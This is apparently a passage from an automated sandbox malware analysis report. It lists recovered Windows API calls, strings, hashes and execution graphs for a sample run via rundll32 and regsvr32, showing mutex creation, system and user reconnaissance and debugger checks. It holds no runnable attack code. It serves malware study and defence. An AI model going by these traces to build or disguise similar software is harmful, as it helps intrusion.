                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,7FB50BC9), ref: 7FB58997
                                                                    • Part of subcall function 7FB5772F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,7FB5C176,0000FDE9,00000000,?,?,?,7FB5BEB7,0000FDE9,00000000,?), ref: 7FB577DB
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7FB589CF
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7FB589EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 158306478-0
                                                                  • Opcode ID: 0897fdaa74f052052c756042335d089ef2a40f735f9c9b40b693249ca0911c93
                                                                  • Instruction ID: e79f4e87418aa5a03140a586961315e766fcc9aaea0c883f9725036a9723561b
                                                                  • Opcode Fuzzy Hash: 0897fdaa74f052052c756042335d089ef2a40f735f9c9b40b693249ca0911c93
                                                                  • Instruction Fuzzy Hash: 771108FA5257197FB31257B76CCCC9F3A6DEE481A43240025F8039B200FE28DE0641B1
                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,7FB5F089,?,00000001,?,?,?,7FB5BB80,?,?,00000000), ref: 7FB5F790
                                                                  • GetLastError.KERNEL32(?,7FB5F089,?,00000001,?,?,?,7FB5BB80,?,?,00000000,?,?,?,7FB5C107,?), ref: 7FB5F79C
                                                                    • Part of subcall function 7FB5F762: CloseHandle.KERNEL32(FFFFFFFE,7FB5F7AC,?,7FB5F089,?,00000001,?,?,?,7FB5BB80,?,?,00000000,?,?), ref: 7FB5F772
                                                                  • ___initconout.LIBCMT ref: 7FB5F7AC
                                                                    • Part of subcall function 7FB5F724: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7FB5F753,7FB5F076,?,?,7FB5BB80,?,?,00000000,?), ref: 7FB5F737
                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,7FB5F089,?,00000001,?,?,?,7FB5BB80,?,?,00000000,?), ref: 7FB5F7C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  • Opcode ID: 0cba93506c04f32051cbabe1d852d9ee631740ad9b042699ce0cbeb3f130a40e
                                                                  • Instruction ID: 9146a4add2c7d331d508a2297d004b889a20b3732a43f3fdc1610812222e70b4
                                                                  • Opcode Fuzzy Hash: 0cba93506c04f32051cbabe1d852d9ee631740ad9b042699ce0cbeb3f130a40e
                                                                  • Instruction Fuzzy Hash: D8F09E3B510254BBCB621E969C04A897E76FB097B1F294411F9299B160DA3198319BA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: +$-
                                                                  • API String ID: 3732870572-2137968064
                                                                  • Opcode ID: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
                                                                  • Instruction ID: a2e68562618decd7e55bb8f8365646e96e866cc6cae6aea86432c6ee19526859
                                                                  • Opcode Fuzzy Hash: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
                                                                  • Instruction Fuzzy Hash: 53A1F5709013599FDF11CE78EA50EFE7BB5EF46220F14A659D876DB284E230E501EB50
                                                                  APIs
                                                                  • std::exception::exception.LIBCONCRTD ref: 7FB15868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::exception::exception
                                                                  • String ID: parse error$parse_error
                                                                  • API String ID: 2807920213-1820534363
                                                                  • Opcode ID: 80bcaf96508d1d940bce20e54d32f1d0bfde467fdd7e2c21801eca430ad88e22
                                                                  • Instruction ID: 4ae7be5dc1c611f6c2868374ce0f8bbbd6e82c738d62d3a75210c2922144443e
                                                                  • Opcode Fuzzy Hash: 80bcaf96508d1d940bce20e54d32f1d0bfde467fdd7e2c21801eca430ad88e22
                                                                  • Instruction Fuzzy Hash: 7DA10FB4D04258DFCB14CFA8D990AEEBBB1FF48300F208199E859AB355DB306A45CF90
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 7FB4457B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 2118026453-2084237596
                                                                  • Opcode ID: f6bbd3ad1b704a65fbef18f9c99ada87767ac41db8acd1dbd552f453ec5184ec
                                                                  • Instruction ID: 9482a85d2103141261ff12b3b22f34067a635240c851e6bb94b0e5c3bc4cfca7
                                                                  • Opcode Fuzzy Hash: f6bbd3ad1b704a65fbef18f9c99ada87767ac41db8acd1dbd552f453ec5184ec
                                                                  • Instruction Fuzzy Hash: C4414972904209EFCF06CF94EE80AEE7BB5FF48304F155199F916A7251E335A960EB50
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7FAF7AF3
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7FAF7BBF
                                                                    • Part of subcall function 7FB3FEA2: _Yarn.LIBCPMT ref: 7FB3FEC1
                                                                    • Part of subcall function 7FB3FEA2: _Yarn.LIBCPMT ref: 7FB3FEE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                  • String ID: bad locale name
                                                                  • API String ID: 1908188788-1405518554
                                                                  • Opcode ID: e00d7d3c30efa9618561fbac00c4f7090de640ced1d483ba5045a5d3e9387ad4
                                                                  • Instruction ID: 114e3ba1e4356dba42e94f627f84c1a331e01b90e305716725c1f692656805f9
                                                                  • Opcode Fuzzy Hash: e00d7d3c30efa9618561fbac00c4f7090de640ced1d483ba5045a5d3e9387ad4
                                                                  • Instruction Fuzzy Hash: 0A41F5B4D05289DFDB01CF98C954BAEFBF1BF49304F248299D415AB381C77AA901CBA5

                                                                  Execution Graph

                                                                  Execution Coverage:1.7%
                                                                  Dynamic/Decrypted Code Coverage:60%
                                                                  Signature Coverage:35.6%
                                                                  Total number of Nodes:45
                                                                  Total number of Limit Nodes:5
                                                                  execution_graph 24382 7f8077a0 24383 7f807a3f CreateMutexA 24382->24383 24385 7f8079a6 24382->24385 24384 7f807b44 GetLastError 24383->24384 24387 7f807a5a 24383->24387 24384->24387 24389 7f807b55 24384->24389 24385->24383 24386 7f807be4 CloseHandle 24386->24387 24389->24386 24390 6b6251c0 24391 6b6251cd 24390->24391 24392 6b62550f GetTempFileNameW 24391->24392 24393 6b625603 GetFileType 24392->24393 24394 6b62567e 24393->24394 24409 6b624c40 24394->24409 24398 6b6258d3 24399 6b625f8a LoadLibraryA 24398->24399 24400 6b626215 24399->24400 24401 6b62653a GetUserNameA 24400->24401 24402 6b626586 24401->24402 24403 6b624c40 GetSystemDirectoryW 24402->24403 24404 6b626778 lstrlenA 24403->24404 24406 6b626d61 24404->24406 24407 6b626e30 lstrlenA 24406->24407 24408 6b627109 24407->24408 24410 6b624ddb GetSystemDirectoryW 24409->24410 24411 6b624df5 GetSystemDirectoryA 24409->24411 24410->24411 24411->24398 24412 7f814392 24413 7f81439b GetPEB 24412->24413 24415 7f8143de PathIsDirectoryW 24413->24415 24419 7f8145b9 24415->24419 24420 7f8148d1 24415->24420 24416 7f8147db LoadLibraryExA 24417 7f814857 24416->24417 24417->24420 24421 7f829280 24417->24421 24419->24416 24426 7f8295f0 24421->24426 24424 7f829497 GetShellWindow 24425 7f8294a1 24424->24425 24425->24420 24427 7f829817 GetProcessHeap 24426->24427 24429 7f82988d 24427->24429 24430 7f8298fe GetDriveTypeA 24429->24430 24431 7f829483 24429->24431 24430->24431 24431->24424 24431->24425 24432 7f83caf0 GetSystemDirectoryW 24435 7f828840 24432->24435 24434 7f83cd96 24436 7f829280 3 API calls 24435->24436 24437 7f828a4e 24436->24437 24437->24434

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414282252.000000006B601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B600000, based on PE: true
                                                                  • Associated: 00000007.00000002.2414267091.000000006B600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414308000.000000006B63B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414326140.000000006B64A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414465986.000000006BAF7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414482610.000000006BAF8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6b600000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: y='$*$8$AzureAD-SecureConv$E$TMP$WinHttpReadData$ntdll
                                                                  • API String ID: 0-3123300459
                                                                  • Opcode ID: 600c5cc662c878ad0baa53b09cc6bb293be94ee9785e4241ada63d2a154c423f
                                                                  • Instruction ID: 8babd3e3ce2aee1a4a0bbd24c0edf158b05775e19ff9dd48b4d869c0037d2127
                                                                  • Opcode Fuzzy Hash: 600c5cc662c878ad0baa53b09cc6bb293be94ee9785e4241ada63d2a154c423f
                                                                  • Instruction Fuzzy Hash: A1922AB4D04668DFEF24DF6AC8907ADBBB1BB4A304F1081EAD548A7348D7349A85CF54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2$MNo name attribute $Q$\$advapi32$c$Operation
                                                                  • API String ID: 0-301690894
                                                                  • Opcode ID: d6f840bb1010973084a88eadc609f49f3a660006fa0e892691d3c13530b808c6
                                                                  • Instruction ID: 318a1610ac9d9411667c6bf01db00e1bfdafc02ebd1bdaa2e7e9de93ed0de681
                                                                  • Opcode Fuzzy Hash: d6f840bb1010973084a88eadc609f49f3a660006fa0e892691d3c13530b808c6
                                                                  • Instruction Fuzzy Hash: 5CE2F478D052698FDB29CF59C894BEDBBB2BF49314F2482DAD449AB341D7306A81CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 441 7f814392-7f8143d8 GetPEB 443 7f8143de-7f81443c 441->443 444 7f81444a 443->444 445 7f81443e-7f814448 443->445 446 7f814454-7f814463 444->446 445->446 447 7f814564-7f814594 446->447 448 7f814469-7f81446f 446->448 447->443 450 7f81459a 447->450 449 7f814472-7f81448b 448->449 449->447 451 7f814491-7f8144b5 449->451 452 7f8145a4-7f8145b3 PathIsDirectoryW 450->452 455 7f8144bf-7f8144df 451->455 453 7f814d07-7f814d19 452->453 454 7f8145b9-7f8145e2 call 7f828fa0 452->454 457 7f814d1b-7f814d21 453->457 462 7f8145e4-7f8145fa 454->462 463 7f8145fc-7f814606 454->463 458 7f8144e1-7f814512 455->458 459 7f8144ef-7f814506 455->459 464 7f814514-7f81455d 458->464 465 7f81455f 458->465 459->455 466 7f814624-7f81466a 462->466 463->466 467 7f814608-7f81460e 463->467 464->452 465->449 469 7f814670-7f81467c 466->469 470 7f8147db-7f814855 LoadLibraryExA 466->470 467->466 468 7f814610-7f81461d 467->468 468->466 469->470 473 7f814682-7f8146bd 469->473 471 7f814863 470->471 472 7f814857-7f814861 470->472 474 7f81486d-7f814877 471->474 472->474 473->470 475 7f8146c3-7f8146cf 473->475 476 7f814885 474->476 477 7f814879-7f814883 474->477 475->470 478 7f8146d5-7f8146df 475->478 479 7f81488f-7f81489b 476->479 477->479 480 7f8146f0-7f8146fa 478->480 481 7f8148a1-7f8148de call 7f829280 479->481 482 7f8149a3-7f8149aa 479->482 483 7f814700-7f81471a 480->483 484 7f8147bf 480->484 499 7f814965-7f81496c 481->499 500 7f8148e4 481->500 486 7f8149b0-7f814a33 call 7f840b50 482->486 487 7f814a6c-7f814abe 482->487 488 7f814735 483->488 489 7f81471c 483->489 484->470 503 7f814a35-7f814a47 486->503 504 7f814a49-7f814a4c 486->504 487->453 495 7f814ac4-7f814adb 487->495 493 7f81473f-7f814746 488->493 491 7f814729-7f814733 489->491 492 7f81471e-7f814727 489->492 491->493 492->488 492->491 497 7f814754 493->497 498 7f814748-7f814752 493->498 501 7f814ae1-7f814b25 call 7f828c80 495->501 505 7f81475e-7f81476a 497->505 498->505 508 7f81499e 499->508 509 7f81496e-7f814975 499->509 506 7f8148e6-7f8148ea 500->506 507 7f8148ec-7f8148f2 500->507 517 7f814b33 501->517 518 7f814b27-7f814b31 501->518 511 7f814a54-7f814a66 503->511 504->511 512 7f8147a1-7f8147ac 505->512 513 7f81476c-7f81479f 505->513 506->499 506->507 514 7f8148f4-7f814925 507->514 515 7f814927-7f814960 507->515 508->487 509->508 516 7f814977-7f814998 call 7f840b50 509->516 511->487 519 7f8147b1-7f8147ba 512->519 513->519 520 7f814963 514->520 515->520 516->508 522 7f814b3d-7f814b43 517->522 518->522 519->480 520->508 525 7f814b45-7f814b69 522->525 526 7f814b77 522->526 525->526 528 7f814b6b-7f814b75 525->528 527 7f814b81-7f814b8d 526->527 529 7f814bc4-7f814bcd 527->529 530 7f814b8f-7f814b9c 527->530 528->527 533 7f814bd7-7f814bdc 529->533 534 7f814bcf-7f814bd5 529->534 531 7f814be7-7f814bee 530->531 532 7f814b9e-7f814bc2 530->532 536 7f814bf0-7f814c0d 531->536 537 7f814c0f-7f814c15 531->537 532->529 532->531 535 7f814bdf-7f814be5 533->535 534->535 538 7f814c5d-7f814c76 535->538 536->538 539 7f814c17-7f814c1e 537->539 540 7f814c2c 537->540 538->501 542 7f814c7c-7f814cd4 call 7f840b50 538->542 539->540 541 7f814c20-7f814c2a 539->541 543 7f814c36-7f814c45 540->543 541->543 548 7f814ce2 542->548 549 7f814cd6-7f814ce0 542->549 545 7f814c53 543->545 546 7f814c47-7f814c51 543->546 545->538 546->538 550 7f814cec-7f814d05 548->550 549->550 550->457
                                                                  APIs
                                                                  • PathIsDirectoryW.SHLWAPI(?), ref: 7F8145AB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectoryPath
                                                                  • String ID:
                                                                  • API String ID: 1580926078-0
                                                                  • Opcode ID: 077276a7f5b1adc2c4cdc42083df1b9f19100786b470f6a50acb094be87e6439
                                                                  • Instruction ID: df8fd37fd8962bc25e89d1f958a91bf23937735d312d4050c941e597608919a6
                                                                  • Opcode Fuzzy Hash: 077276a7f5b1adc2c4cdc42083df1b9f19100786b470f6a50acb094be87e6439
                                                                  • Instruction Fuzzy Hash: 4FB1E474D05269CBDB29CF58C895BADBBB2BF49300F2482DAD419AB345D7306E81CF54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 274 7f8077a0-7f8079a0 275 7f8079a6-7f8079a9 274->275 276 7f807a3f-7f807a54 CreateMutexA 274->276 277 7f8079b0-7f8079d0 275->277 278 7f807a00-7f807a12 275->278 279 7f8079d2-7f8079d8 275->279 280 7f807a14-7f807a39 275->280 281 7f807b44-7f807b4f GetLastError 276->281 282 7f807a5a-7f807ab3 call 7f828fa0 276->282 277->276 278->276 283 7f8079da-7f8079eb 279->283 284 7f8079ed-7f8079f5 279->284 280->276 286 7f807ce0-7f807cf3 281->286 287 7f807b55-7f807bd2 call 7f840b50 281->287 292 7f807ab5 282->292 293 7f807ac9 282->293 289 7f8079f8-7f8079fe 283->289 284->289 288 7f807cf8-7f807cfc 286->288 295 7f807bd4-7f807bd8 287->295 296 7f807be9-7f807c02 287->296 289->276 298 7f807ac0-7f807ac7 292->298 299 7f807ab7-7f807abe 292->299 297 7f807ad0-7f807ae9 293->297 300 7f807c07-7f807c0b 295->300 301 7f807bda-7f807bde 295->301 304 7f807cb6-7f807cde CloseHandle 296->304 302 7f807aeb 297->302 303 7f807aff 297->303 298->297 299->293 299->298 309 7f807c16 300->309 310 7f807c0d-7f807c14 300->310 305 7f807be4 301->305 306 7f807c9f-7f807cb3 301->306 307 7f807af6-7f807afd 302->307 308 7f807aed-7f807af4 302->308 311 7f807b06-7f807b0c 303->311 304->288 305->304 306->304 307->311 308->303 308->307 312 7f807c1d-7f807c26 309->312 310->312 313 7f807b3d-7f807b3f 311->313 314 7f807b0e-7f807b3a call 7f840b50 311->314 315 7f807c31 312->315 316 7f807c28-7f807c2f 312->316 313->288 314->313 318 7f807c38-7f807c3e 315->318 316->318 320 7f807c40-7f807c47 318->320 321 7f807c49 318->321 322 7f807c50-7f807c59 320->322 321->322 323 7f807c5b-7f807c6d 322->323 324 7f807c6f-7f807c72 322->324 325 7f807c7a-7f807c9d 323->325 324->325 325->304
                                                                  APIs
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F807A47
                                                                  • GetLastError.KERNEL32 ref: 7F807B44
                                                                  • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F807CBA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                  • String ID: *$9mD$B$u${
                                                                  • API String ID: 4294037311-4130828584
                                                                  • Opcode ID: 03977b8a174bdd92de86c554d8e09359e5273d9b17af9cc02c440fc96b7ae292
                                                                  • Instruction ID: 104fd68991e64f9ae32313dc5c8343b57a14b9941172ff08c5e68e1e6adf910c
                                                                  • Opcode Fuzzy Hash: 03977b8a174bdd92de86c554d8e09359e5273d9b17af9cc02c440fc96b7ae292
                                                                  • Instruction Fuzzy Hash: 0CF159B5D04258DFDB14CFA9C8857AEBBF2BF49310F2481AAD159AB350D3345A81CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 326 7f83caf0-7f83cd91 GetSystemDirectoryW call 7f828840 328 7f83cd96-7f83d10b call 7f840b50 326->328 348 7f83e791-7f83e7af 328->348 349 7f83d111-7f83d161 call 7f807e00 328->349 350 7f83e7b5-7f83e7c2 348->350 351 7f83e864-7f83e881 348->351 349->348 354 7f83e7d0 350->354 355 7f83e7c4-7f83e7ce 350->355 356 7f83e885-7f83e88c 351->356 358 7f83e7da-7f83e7e1 354->358 355->358 359 7f83e7e3-7f83e7ed 358->359 360 7f83e7ef 358->360 361 7f83e7f9-7f83e805 359->361 360->361 362 7f83e822-7f83e846 361->362 363 7f83e807-7f83e820 361->363 364 7f83e862 362->364 365 7f83e848-7f83e85c 362->365 363->364 364->356 365->364
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F83CCEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: )$2$?$m$n $e
                                                                  • API String ID: 2188284642-1749247282
                                                                  • Opcode ID: b300993bd0065ce2f736b04c4c7a29356d46a289bd7bf9a12c9fe090dffb2fa8
                                                                  • Instruction ID: cacf4db1cd76641bf677e294175868607fe27d12ced27898781779c2fe8efbd8
                                                                  • Opcode Fuzzy Hash: b300993bd0065ce2f736b04c4c7a29356d46a289bd7bf9a12c9fe090dffb2fa8
                                                                  • Instruction Fuzzy Hash: 24F13B75D04268CBDB25CFAAC8597ADBBF2BF49310F2480DAD049AB250D7745A84CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 366 7f829280-7f82947e call 7f8295f0 368 7f829483-7f829495 366->368 369 7f8294a1-7f8294ab 368->369 370 7f829497-7f82949d GetShellWindow 368->370 371 7f8294c0-7f8294ec call 7f840b50 369->371 372 7f8294ad-7f8294be 369->372 370->369 379 7f8294f7 371->379 380 7f8294ee-7f8294f5 371->380 373 7f82950e-7f829526 372->373 376 7f829536-7f829539 373->376 377 7f829528-7f829534 373->377 378 7f82953e-7f82956d 376->378 377->378 381 7f829578 378->381 382 7f82956f-7f829576 378->382 383 7f8294fe-7f829507 379->383 380->383 384 7f82957f-7f829585 381->384 382->384 383->373 385 7f829590 384->385 386 7f829587-7f82958e 384->386 387 7f829597-7f8295ea 385->387 386->387
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ShellWindow
                                                                  • String ID: 2$MNo name attribute $Q$\$c
                                                                  • API String ID: 2831631499-3960561890
                                                                  • Opcode ID: 2f5ff9dbfb617a41453f4f4e0e9c5cec2332563675b0f4079fce6561855d95e9
                                                                  • Instruction ID: 1eb557c9992a7ad6006cce56e4b49510412e1a14dff1e27ce80db4321e599452
                                                                  • Opcode Fuzzy Hash: 2f5ff9dbfb617a41453f4f4e0e9c5cec2332563675b0f4079fce6561855d95e9
                                                                  • Instruction Fuzzy Hash: 95A14979D04298CFDB14CFAAC8847ADBBF1BF49320F28819AD448A7381D7745A84CF65

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 388 7f8295f0-7f829815 389 7f829817-7f82984a 388->389 390 7f82984c-7f829853 388->390 391 7f82986f-7f82988b GetProcessHeap 389->391 390->391 392 7f829855-7f82986b 390->392 393 7f8298a0 391->393 394 7f82988d-7f829895 391->394 392->391 396 7f8298a7-7f8298ae 393->396 394->393 395 7f829897-7f82989e 394->395 395->396 397 7f8298b0-7f8298bc 396->397 398 7f8298be-7f8298c1 396->398 399 7f8298c6-7f8298d8 397->399 398->399 400 7f8298da 399->400 401 7f8298ed 399->401 402 7f8298e4-7f8298eb 400->402 403 7f8298dc-7f8298e2 400->403 404 7f8298f4-7f8298fc 401->404 402->404 403->401 403->402 405 7f8298fe-7f829909 GetDriveTypeA 404->405 406 7f82990c-7f829952 404->406 405->406
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 7F82986F
                                                                  • GetDriveTypeA.KERNEL32(7F8681EC), ref: 7F829903
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DriveHeapProcessType
                                                                  • String ID: *
                                                                  • API String ID: 2912393814-163128923
                                                                  • Opcode ID: 724bbba60d528a4b7e8452afe7ffcc81a01c73a3dd3726dd363e30684cfd1e19
                                                                  • Instruction ID: f02b01635b9fa195b717eb263e18c8b6d9a4fd545d310cadf86dc6603a81337b
                                                                  • Opcode Fuzzy Hash: 724bbba60d528a4b7e8452afe7ffcc81a01c73a3dd3726dd363e30684cfd1e19
                                                                  • Instruction Fuzzy Hash: DEA11779E04258CFCB54CFAAC45979DBBF2BB49320F3881AAD459A7341E7301A94CF61
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F841423
                                                                  • IsDebuggerPresent.KERNEL32 ref: 7F8414EF
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F841508
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 7F841512
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: e32f7757897ec218fef19c188a65d40bb922c2c4540af571154f370bbbe543f1
                                                                  • Instruction ID: 5ee482c8a4bfc280b4b7cb1018099a7e5cf51f47e052d75c07e68496081027c5
                                                                  • Opcode Fuzzy Hash: e32f7757897ec218fef19c188a65d40bb922c2c4540af571154f370bbbe543f1
                                                                  • Instruction Fuzzy Hash: 9A310479D0132C9BDF11DFA4C949BCDBBB9AF08310F1051AAE50DAB250EB719B848F95
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: @
                                                                  • API String ID: 3732870572-2766056989
                                                                  • Opcode ID: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                                  • Instruction ID: ae46a9c6e7de03fe05ca2384268d4e7ab21dfbf2b56211246b9cf60434f758a2
                                                                  • Opcode Fuzzy Hash: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                                  • Instruction Fuzzy Hash: A37180B4E04259DFCB08CF98C591AEEBBB2FF48304F14819AE915AB345D734AA81CF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                                  • API String ID: 0-285284801
                                                                  • Opcode ID: 362103b203e24b033bc36ebfe122250f112641ca32b31a509b54068d2f84cd47
                                                                  • Instruction ID: 922c60f5fdb10892a9cb4fc40b462fb9fe062166dde7025ccb0d7149bd5986b6
                                                                  • Opcode Fuzzy Hash: 362103b203e24b033bc36ebfe122250f112641ca32b31a509b54068d2f84cd47
                                                                  • Instruction Fuzzy Hash: 2EB14474E08388DFEB05CFA8C895BDEBBB2AF48304F104159E545BB381D7B56A45CB61
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7F84ED54
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7F84ED78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
